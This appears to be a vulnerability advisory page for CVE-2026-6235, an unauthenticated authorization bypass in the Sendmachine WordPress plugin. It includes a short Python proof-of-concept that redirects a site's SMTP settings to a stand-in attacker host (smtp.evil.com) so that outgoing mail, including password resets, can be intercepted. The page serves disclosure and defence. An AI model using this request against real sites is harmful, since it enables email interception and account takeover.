Security Vulnerability Report
中文
CVE-2026-6235 CVSS 9.8 CRITICAL

CVE-2026-6235

Published: 2026-04-22 09:16:26
Last Modified: 2026-04-22 20:22:51
Source: [email protected]

Description

The Sendmachine for WordPress plugin for WordPress is vulnerable to authorization bypass via the 'manage_admin_requests' function in all versions up to, and including, 1.0.20. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to overwrite the plugin's SMTP configuration, which can be leveraged to intercept all outbound emails from the site (including password reset emails).

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Sendmachine for WordPress <= 1.0.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-6235 PoC: Sendmachine Plugin Authorization Bypass # This script demonstrates how an unauthenticated user can update SMTP settings. target_url = "http://example.com/wp-admin/admin-ajax.php" attacker_smtp_host = "smtp.evil.com" attacker_smtp_port = "25" attacker_email = "[email protected]" # Payload to overwrite SMTP configuration # Note: The specific parameter names might vary based on exact plugin implementation payload = { "action": "manage_admin_requests", "method": "save_smtp_config", "host": attacker_smtp_host, "port": attacker_smtp_port, "user": attacker_email, "pass": "password123" } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] SMTP configuration potentially overwritten.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6235", "sourceIdentifier": "[email protected]", "published": "2026-04-22T09:16:26.263", "lastModified": "2026-04-22T20:22:50.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Sendmachine for WordPress plugin for WordPress is vulnerable to authorization bypass via the 'manage_admin_requests' function in all versions up to, and including, 1.0.20. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to overwrite the plugin's SMTP configuration, which can be leveraged to intercept all outbound emails from the site (including password reset emails)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/sendmachine/tags/1.0.20/includes/sendmachine_email_manager.php#L39", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/sendmachine/tags/1.0.20/sendmachine_wp_admin.php#L174", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/sendmachine/tags/1.0.20/sendmachine_wp_admin.php#L183", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7889e071-84a8-46ec-abe5-5c98980ce275?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.